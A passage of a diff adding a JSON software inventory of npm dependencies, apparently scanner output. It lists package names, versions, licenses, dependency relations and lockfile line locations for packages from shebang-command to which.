"@img/sharp-win32-arm64@0.34.5", + "@img/sharp-win32-ia32@0.34.5", + "@img/sharp-win32-x64@0.34.5", + "detect-libc@2.1.2", + "semver@7.7.4" + ], + "Locations": [ + { + "StartLine": 8882, + "EndLine": 8924 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "shebang-command@2.0.0", + "Name": "shebang-command", + "Identifier": { + "PURL": "pkg:npm/shebang-command@2.0.0", + "UID": "e7ea01266a89c919" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "shebang-regex@3.0.0" + ], + "Locations": [ + { + "StartLine": 8925, + "EndLine": 8936 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "shebang-regex@3.0.0", + "Name": "shebang-regex", + "Identifier": { + "PURL": "pkg:npm/shebang-regex@3.0.0", + "UID": "c0d20708c9d67231" + }, + "Version": "3.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8937, + "EndLine": 8945 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "side-channel@1.1.0", + "Name": "side-channel", + "Identifier": { + "PURL": "pkg:npm/side-channel@1.1.0", + "UID": "7e83553b58e9cd60" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "es-errors@1.3.0", + "object-inspect@1.13.4", + "side-channel-list@1.0.1", + "side-channel-map@1.0.1", + "side-channel-weakmap@1.0.2" + ], + "Locations": [ + { + "StartLine": 8946, + "EndLine": 8964 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "side-channel-list@1.0.1", + "Name": "side-channel-list", + "Identifier": { + "PURL": "pkg:npm/side-channel-list@1.0.1", + "UID": "35cfde0efedb46b4" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "es-errors@1.3.0", + "object-inspect@1.13.4" + ], + "Locations": [ + { + "StartLine": 8965, + "EndLine": 8980 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "side-channel-map@1.0.1", + "Name": "side-channel-map", + "Identifier": { + "PURL": "pkg:npm/side-channel-map@1.0.1", + "UID": "81733fe0f469f610" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "call-bound@1.0.4", + "es-errors@1.3.0", + "get-intrinsic@1.3.0", + "object-inspect@1.13.4" + ], + "Locations": [ + { + "StartLine": 8981, + "EndLine": 8998 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "side-channel-weakmap@1.0.2", + "Name": "side-channel-weakmap", + "Identifier": { + "PURL": "pkg:npm/side-channel-weakmap@1.0.2", + "UID": "f2f3f805d82ecb17" + }, + "Version": "1.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "call-bound@1.0.4", + "es-errors@1.3.0", + "get-intrinsic@1.3.0", + "object-inspect@1.13.4", + "side-channel-map@1.0.1" + ], + "Locations": [ + { + "StartLine": 8999, + "EndLine": 9017 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "signal-exit@4.1.0", + "Name": "signal-exit", + "Identifier": { + "PURL": "pkg:npm/signal-exit@4.1.0", + "UID": "9987983731dab0d8" + }, + "Version": "4.1.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9025, + "EndLine": 9036 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "simple-swizzle@0.2.4", + "Name": "simple-swizzle", + "Identifier": { + "PURL": "pkg:npm/simple-swizzle@0.2.4", + "UID": "482cb7e2cb5f5846" + }, + "Version": "0.2.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "is-arrayish@0.3.4" + ], + "Locations": [ + { + "StartLine": 9037, + "EndLine": 9045 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "socket.io@4.8.3", + "Name": "socket.io", + "Identifier": { + "PURL": "pkg:npm/socket.io@4.8.3", + "UID": "80b4cdedb9e7766f" + }, + "Version": "4.8.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "accepts@1.3.8", + "base64id@2.0.0", + "cors@2.8.6", + "debug@4.4.3", + "engine.io@6.6.7", + "socket.io-adapter@2.5.6", + "socket.io-parser@4.2.6" + ], + "Locations": [ + { + "StartLine": 9046, + "EndLine": 9063 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "socket.io-adapter@2.5.6", + "Name": "socket.io-adapter", + "Identifier": { + "PURL": "pkg:npm/socket.io-adapter@2.5.6", + "UID": "3844a4bb3b9715d8" + }, + "Version": "2.5.6", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "debug@4.4.3", + "ws@8.18.3" + ], + "Locations": [ + { + "StartLine": 9064, + "EndLine": 9073 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "socket.io-client@4.8.3", + "Name": "socket.io-client", + "Identifier": { + "PURL": "pkg:npm/socket.io-client@4.8.3", + "UID": "d3fec6c38ccacc58" + }, + "Version": "4.8.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@socket.io/component-emitter@3.1.2", + "debug@4.4.3", + "engine.io-client@6.6.4", + "socket.io-parser@4.2.6" + ], + "Locations": [ + { + "StartLine": 9074, + "EndLine": 9088 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "socket.io-parser@4.2.6", + "Name": "socket.io-parser", + "Identifier": { + "PURL": "pkg:npm/socket.io-parser@4.2.6", + "UID": "fd9bc0ec05ffa9e0" + }, + "Version": "4.2.6", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@socket.io/component-emitter@3.1.2", + "debug@4.4.3" + ], + "Locations": [ + { + "StartLine": 9089, + "EndLine": 9101 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "source-map-js@1.2.1", + "Name": "source-map-js", + "Identifier": { + "PURL": "pkg:npm/source-map-js@1.2.1", + "UID": "6b703d9c8862f921" + }, + "Version": "1.2.1", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9112, + "EndLine": 9120 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "standard-as-callback@2.1.0", + "Name": "standard-as-callback", + "Identifier": { + "PURL": "pkg:npm/standard-as-callback@2.1.0", + "UID": "a7ea42315c7bec2" + }, + "Version": "2.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9139, + "EndLine": 9144 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "statuses@2.0.2", + "Name": "statuses", + "Identifier": { + "PURL": "pkg:npm/statuses@2.0.2", + "UID": "738967afa781963a" + }, + "Version": "2.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9145, + "EndLine": 9153 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "stream-events@1.0.5", + "Name": "stream-events", + "Identifier": { + "PURL": "pkg:npm/stream-events@1.0.5", + "UID": "3a3425ed8fa0c6bc" + }, + "Version": "1.0.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "stubs@3.0.0" + ], + "Locations": [ + { + "StartLine": 9161, + "EndLine": 9170 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "stream-shift@1.0.3", + "Name": "stream-shift", + "Identifier": { + "PURL": "pkg:npm/stream-shift@1.0.3", + "UID": "90944ee34a30f780" + }, + "Version": "1.0.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9171, + "EndLine": 9177 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "streamsearch@1.1.0", + "Name": "streamsearch", + "Identifier": { + "PURL": "pkg:npm/streamsearch@1.1.0", + "UID": "eaa108b0e8e5af51" + }, + "Version": "1.1.0", + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9178, + "EndLine": 9185 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "string-width@4.2.3", + "Name": "string-width", + "Identifier": { + "PURL": "pkg:npm/string-width@4.2.3", + "UID": "7ac7f3d74734ab72" + }, + "Version": "4.2.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "emoji-regex@8.0.0", + "is-fullwidth-code-point@3.0.0", + "strip-ansi@6.0.1" + ], + "Locations": [ + { + "StartLine": 9195, + "EndLine": 9208 + }, + { + "StartLine": 9209, + "EndLine": 9223 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "string-width@5.1.2", + "Name": "string-width", + "Identifier": { + "PURL": "pkg:npm/string-width@5.1.2", + "UID": "9eed3a2819296bb" + }, + "Version": "5.1.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "eastasianwidth@0.2.0", + "emoji-regex@9.2.2", + "strip-ansi@7.2.0" + ], + "Locations": [ + { + "StartLine": 1465, + "EndLine": 1481 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "string_decoder@1.1.1", + "Name": "string_decoder", + "Identifier": { + "PURL": "pkg:npm/string_decoder@1.1.1", + "UID": "d8306eb1610e827c" + }, + "Version": "1.1.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "safe-buffer@5.1.2" + ], + "Locations": [ + { + "StartLine": 4158, + "EndLine": 4166 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "string_decoder@1.3.0", + "Name": "string_decoder", + "Identifier": { + "PURL": "pkg:npm/string_decoder@1.3.0", + "UID": "71749bade2a0a7b2" + }, + "Version": "1.3.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "safe-buffer@5.2.1" + ], + "Locations": [ + { + "StartLine": 9186, + "EndLine": 9194 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "strip-ansi@6.0.1", + "Name": "strip-ansi", + "Identifier": { + "PURL": "pkg:npm/strip-ansi@6.0.1", + "UID": "679f2afacaaa74a5" + }, + "Version": "6.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "ansi-regex@5.0.1" + ], + "Locations": [ + { + "StartLine": 9236, + "EndLine": 9247 + }, + { + "StartLine": 9248, + "EndLine": 9260 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "strip-ansi@7.2.0", + "Name": "strip-ansi", + "Identifier": { + "PURL": "pkg:npm/strip-ansi@7.2.0", + "UID": "ea10cde9417af1c7" + }, + "Version": "7.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "ansi-regex@6.2.2" + ], + "Locations": [ + { + "StartLine": 1482, + "EndLine": 1496 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "strnum@2.2.3", + "Name": "strnum", + "Identifier": { + "PURL": "pkg:npm/strnum@2.2.3", + "UID": "77a34942036797f" + }, + "Version": "2.2.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9317, + "EndLine": 9329 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "stubs@3.0.0", + "Name": "stubs", + "Identifier": { + "PURL": "pkg:npm/stubs@3.0.0", + "UID": "296b9443626805f1" + }, + "Version": "3.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9330, + "EndLine": 9336 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "styled-jsx@5.1.1", + "Name": "styled-jsx", + "Identifier": { + "PURL": "pkg:npm/styled-jsx@5.1.1", + "UID": "67dd3be4fccbb5af" + }, + "Version": "5.1.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "client-only@0.0.1", + "react@18.3.1" + ], + "Locations": [ + { + "StartLine": 9337, + "EndLine": 9359 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "sucrase@3.35.1", + "Name": "sucrase", + "Identifier": { + "PURL": "pkg:npm/sucrase@3.35.1", + "UID": "70d825c8742a0c59" + }, + "Version": "3.35.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@jridgewell/gen-mapping@0.3.13", + "commander@4.1.1", + "lines-and-columns@1.2.4", + "mz@2.7.0", + "pirates@4.0.7", + "tinyglobby@0.2.16", + "ts-interface-checker@0.1.13" + ], + "Locations": [ + { + "StartLine": 9360, + "EndLine": 9381 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "supports-preserve-symlinks-flag@1.0.0", + "Name": "supports-preserve-symlinks-flag", + "Identifier": { + "PURL": "pkg:npm/supports-preserve-symlinks-flag@1.0.0", + "UID": "95b841fd7cc1fffe" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9480, + "EndLine": 9491 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "svg-arc-to-cubic-bezier@3.2.0", + "Name": "svg-arc-to-cubic-bezier", + "Identifier": { + "PURL": "pkg:npm/svg-arc-to-cubic-bezier@3.2.0", + "UID": "6e042538093944d9" + }, + "Version": "3.2.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9492, + "EndLine": 9497 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "tailwindcss@3.4.19", + "Name": "tailwindcss", + "Identifier": { + "PURL": "pkg:npm/tailwindcss@3.4.19", + "UID": "492f52845e062ad7" + }, + "Version": "3.4.19", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@alloc/quick-lru@5.2.0", + "arg@5.0.2", + "chokidar@3.6.0", + "didyoumean@1.2.2", + "dlv@1.1.3", + "fast-glob@3.3.3", + "glob-parent@6.0.2", + "is-glob@4.0.3", + "jiti@1.21.7", + "lilconfig@3.1.3", + "micromatch@4.0.8", + "normalize-path@3.0.0", + "object-hash@3.0.0", + "picocolors@1.1.1", + "postcss-import@15.1.0", + "postcss-js@4.1.0", + "postcss-load-config@6.0.1", + "postcss-nested@6.2.0", + "postcss-selector-parser@6.1.2", + "postcss@8.5.12", + "resolve@1.22.12", + "sucrase@3.35.1" + ], + "Locations": [ + { + "StartLine": 9498, + "EndLine": 9534 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "teeny-request@9.0.0", + "Name": "teeny-request", + "Identifier": { + "PURL": "pkg:npm/teeny-request@9.0.0", + "UID": "1b0bf4d2a4776d91" + }, + "Version": "9.0.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "http-proxy-agent@5.0.0", + "https-proxy-agent@5.0.1", + "node-fetch@2.7.0", + "stream-events@1.0.5", + "uuid@9.0.1" + ], + "Locations": [ + { + "StartLine": 9535, + "EndLine": 9551 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "thenify@3.3.1", + "Name": "thenify", + "Identifier": { + "PURL": "pkg:npm/thenify@3.3.1", + "UID": "1f012dc5fe116c3e" + }, + "Version": "3.3.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "any-promise@1.3.0" + ], + "Locations": [ + { + "StartLine": 9601, + "EndLine": 9609 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "thenify-all@1.6.0", + "Name": "thenify-all", + "Identifier": { + "PURL": "pkg:npm/thenify-all@1.6.0", + "UID": "b61fcb84a1ede03b" + }, + "Version": "1.6.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "thenify@3.3.1" + ], + "Locations": [ + { + "StartLine": 9610, + "EndLine": 9621 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "thirty-two@1.0.2", + "Name": "thirty-two", + "Identifier": { + "PURL": "pkg:npm/thirty-two@1.0.2", + "UID": "ab61c26779f06bd3" + }, + "Version": "1.0.2", + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9622, + "EndLine": 9629 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "tiny-inflate@1.0.3", + "Name": "tiny-inflate", + "Identifier": { + "PURL": "pkg:npm/tiny-inflate@1.0.3", + "UID": "74c950df4484b3fa" + }, + "Version": "1.0.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9630, + "EndLine": 9635 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "tiny-invariant@1.3.3", + "Name": "tiny-invariant", + "Identifier": { + "PURL": "pkg:npm/tiny-invariant@1.3.3", + "UID": "5aead8c9965b5d43" + }, + "Version": "1.3.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9636, + "EndLine": 9641 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "tinyglobby@0.2.16", + "Name": "tinyglobby", + "Identifier": { + "PURL": "pkg:npm/tinyglobby@0.2.16", + "UID": "ceea37b0a7812d4" + }, + "Version": "0.2.16", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "fdir@6.5.0", + "picomatch@4.0.4" + ], + "Locations": [ + { + "StartLine": 9649, + "EndLine": 9664 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "to-regex-range@5.0.1", + "Name": "to-regex-range", + "Identifier": { + "PURL": "pkg:npm/to-regex-range@5.0.1", + "UID": "a26acf74aae52d11" + }, + "Version": "5.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "is-number@7.0.0" + ], + "Locations": [ + { + "StartLine": 9714, + "EndLine": 9725 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "toidentifier@1.0.1", + "Name": "toidentifier", + "Identifier": { + "PURL": "pkg:npm/toidentifier@1.0.1", + "UID": "6d0d33c566903937" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9726, + "EndLine": 9734 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "tr46@0.0.3", + "Name": "tr46", + "Identifier": { + "PURL": "pkg:npm/tr46@0.0.3", + "UID": "475e4fc5c9feb30" + }, + "Version": "0.0.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9735, + "EndLine": 9740 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "ts-interface-checker@0.1.13", + "Name": "ts-interface-checker", + "Identifier": { + "PURL": "pkg:npm/ts-interface-checker@0.1.13", + "UID": "f9f1955d2979f27b" + }, + "Version": "0.1.13", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9751, + "EndLine": 9756 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "tslib@2.4.1", + "Name": "tslib", + "Identifier": { + "PURL": "pkg:npm/tslib@2.4.1", + "UID": "1258c0e23455373" + }, + "Version": "2.4.1", + "Licenses": [ + "0BSD" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9893, + "EndLine": 9898 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "tslib@2.8.1", + "Name": "tslib", + "Identifier": { + "PURL": "pkg:npm/tslib@2.8.1", + "UID": "d1457c8f212a3c9b" + }, + "Version": "2.8.1", + "Licenses": [ + "0BSD" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2736, + "EndLine": 2741 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "twilio@5.13.1", + "Name": "twilio", + "Identifier": { + "PURL": "pkg:npm/twilio@5.13.1", + "UID": "1313c288fc26a5fd" + }, + "Version": "5.13.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "axios@1.15.2", + "dayjs@1.11.20", + "https-proxy-agent@5.0.1", + "jsonwebtoken@9.0.3", + "qs@6.14.2", + "scmp@2.1.0", + "xmlbuilder@13.0.2" + ], + "Locations": [ + { + "StartLine": 10001, + "EndLine": 10018 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "type-is@1.6.18", + "Name": "type-is", + "Identifier": { + "PURL": "pkg:npm/type-is@1.6.18", + "UID": "60ecb3bacb70bc1a" + }, + "Version": "1.6.18", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "media-typer@0.3.0", + "mime-types@2.1.35" + ], + "Locations": [ + { + "StartLine": 10080, + "EndLine": 10092 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "typedarray@0.0.6", + "Name": "typedarray", + "Identifier": { + "PURL": "pkg:npm/typedarray@0.0.6", + "UID": "e37857a0e28e3dd0" + }, + "Version": "0.0.6", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10093, + "EndLine": 10098 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "undici-types@6.21.0", + "Name": "undici-types", + "Identifier": { + "PURL": "pkg:npm/undici-types@6.21.0", + "UID": "67a6036fc7b5abcf" + }, + "Version": "6.21.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10120, + "EndLine": 10125 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "unicode-properties@1.4.1", + "Name": "unicode-properties", + "Identifier": { + "PURL": "pkg:npm/unicode-properties@1.4.1", + "UID": "4ccff6046bd0f674" + }, + "Version": "1.4.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "base64-js@1.5.1", + "unicode-trie@2.0.0" + ], + "Locations": [ + { + "StartLine": 10126, + "EndLine": 10135 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "unicode-trie@2.0.0", + "Name": "unicode-trie", + "Identifier": { + "PURL": "pkg:npm/unicode-trie@2.0.0", + "UID": "3f212f2d10be47f2" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "pako@0.2.9", + "tiny-inflate@1.0.3" + ], + "Locations": [ + { + "StartLine": 10136, + "EndLine": 10145 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "unpipe@1.0.0", + "Name": "unpipe", + "Identifier": { + "PURL": "pkg:npm/unpipe@1.0.0", + "UID": "c67f500119cb9f3" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10152, + "EndLine": 10160 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "update-browserslist-db@1.2.3", + "Name": "update-browserslist-db", + "Identifier": { + "PURL": "pkg:npm/update-browserslist-db@1.2.3", + "UID": "19a4780ba2278215" + }, + "Version": "1.2.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "browserslist@4.28.2", + "escalade@3.2.0", + "picocolors@1.1.1" + ], + "Locations": [ + { + "StartLine": 10161, + "EndLine": 10190 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "util-deprecate@1.0.2", + "Name": "util-deprecate", + "Identifier": { + "PURL": "pkg:npm/util-deprecate@1.0.2", + "UID": "235bfe23ae290480" + }, + "Version": "1.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10201, + "EndLine": 10206 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "utils-merge@1.0.1", + "Name": "utils-merge", + "Identifier": { + "PURL": "pkg:npm/utils-merge@1.0.1", + "UID": "b916ae5e87e8a7ae" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10207, + "EndLine": 10215 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "uuid@10.0.0", + "Name": "uuid", + "Identifier": { + "PURL": "pkg:npm/uuid@10.0.0", + "UID": "1ddd00c8cdc7fbea" + }, + "Version": "10.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10216, + "EndLine": 10229 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "uuid@8.3.2", + "Name": "uuid", + "Identifier": { + "PURL": "pkg:npm/uuid@8.3.2", + "UID": "831014183778cf43" + }, + "Version": "8.3.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 846, + "EndLine": 856 + }, + { + "StartLine": 7331, + "EndLine": 7340 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "uuid@9.0.1", + "Name": "uuid", + "Identifier": { + "PURL": "pkg:npm/uuid@9.0.1", + "UID": "eed601fd93084a2d" + }, + "Version": "9.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5738, + "EndLine": 5752 + }, + { + "StartLine": 5929, + "EndLine": 5943 + }, + { + "StartLine": 9579, + "EndLine": 9593 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "vary@1.1.2", + "Name": "vary", + "Identifier": { + "PURL": "pkg:npm/vary@1.1.2", + "UID": "6de7b341ec76f663" + }, + "Version": "1.1.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10237, + "EndLine": 10245 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "victory-vendor@36.9.2", + "Name": "victory-vendor", + "Identifier": { + "PURL": "pkg:npm/victory-vendor@36.9.2", + "UID": "8c41cf750385cd24" + }, + "Version": "36.9.2", + "Licenses": [ + "MIT AND ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@types/d3-array@3.2.2", + "@types/d3-ease@3.0.2", + "@types/d3-interpolate@3.0.4", + "@types/d3-scale@4.0.9", + "@types/d3-shape@3.1.8", + "@types/d3-time@3.0.4", + "@types/d3-timer@3.0.2", + "d3-array@3.2.4", + "d3-ease@3.0.1", + "d3-interpolate@3.0.1", + "d3-scale@4.0.2", + "d3-shape@3.2.0", + "d3-time@3.1.0", + "d3-timer@3.0.1" + ], + "Locations": [ + { + "StartLine": 10246, + "EndLine": 10267 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "vite-compatible-readable-stream@3.6.1", + "Name": "vite-compatible-readable-stream", + "Identifier": { + "PURL": "pkg:npm/vite-compatible-readable-stream@3.6.1", + "UID": "e454880bf1caca50" + }, + "Version": "3.6.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "inherits@2.0.4", + "string_decoder@1.3.0", + "util-deprecate@1.0.2" + ], + "Locations": [ + { + "StartLine": 10328, + "EndLine": 10341 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "webidl-conversions@3.0.1", + "Name": "webidl-conversions", + "Identifier": { + "PURL": "pkg:npm/webidl-conversions@3.0.1", + "UID": "d884f1e793f9faff" + }, + "Version": "3.0.1", + "Licenses": [ + "BSD-2-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10431, + "EndLine": 10436 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "websocket-driver@0.7.4", + "Name": "websocket-driver", + "Identifier": { + "PURL": "pkg:npm/websocket-driver@0.7.4", + "UID": "bb3a9d7698310cc2" + }, + "Version": "0.7.4", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "http-parser-js@0.5.10", + "safe-buffer@5.2.1", + "websocket-extensions@0.1.4" + ], + "Locations": [ + { + "StartLine": 10437, + "EndLine": 10450 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "websocket-extensions@0.1.4", + "Name": "websocket-extensions", + "Identifier": { + "PURL": "pkg:npm/websocket-extensions@0.1.4", + "UID": "2fb21839a861a15b" + }, + "Version": "0.1.4", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10451, + "EndLine": 10459 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "whatwg-url@5.0.0", + "Name": "whatwg-url", + "Identifier": { + "PURL": "pkg:npm/whatwg-url@5.0.0", + "UID": "125906d114aa04c4" + }, + "Version": "5.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "tr46@0.0.3", + "webidl-conversions@3.0.1" + ], + "Locations": [ + { + "StartLine": 10460, + "EndLine": 10469 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "which@2.0.2", + "Name": "which", + "Identifier": { + "PURL": "pkg:npm/which@2.0.2", + "UID": "bd944a1b8e2e3803" + }, + "Version": "2.0.2", + "Licenses": [ + "ISC" + ], + 